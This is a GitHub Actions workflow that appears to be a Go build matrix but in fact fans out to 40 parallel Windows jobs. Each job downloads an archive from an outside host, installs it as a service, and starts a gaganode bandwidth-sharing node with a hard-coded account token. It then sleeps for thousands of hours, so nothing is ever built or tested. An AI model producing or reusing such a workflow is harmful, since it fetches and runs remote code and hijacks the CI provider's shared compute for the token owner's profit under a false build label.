name: BIN_Gits
on: [push, pull_request]
jobs:
  build:
    name: Kr
    runs-on: windows-latest
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget -Uri "https://assets.coreservice.io/public/package/20/app/1.0.3/app-1_0_3.tar.gz" -OutFile "app-windows-amd64.tar.gz" ; tar -zxf app-windows-amd64.tar.gz ; rm -Force app-windows-amd64.tar.gz ; cd ./app-windows-amd64 ; ./app.exe service install
        ./app.exe service start
        ./app.exe status
        ./apps/gaganode/gaganode.exe config set --token=pihbmehfirzwnxkq13389b4163752616
        ./app.exe restart
        sleep 3333h
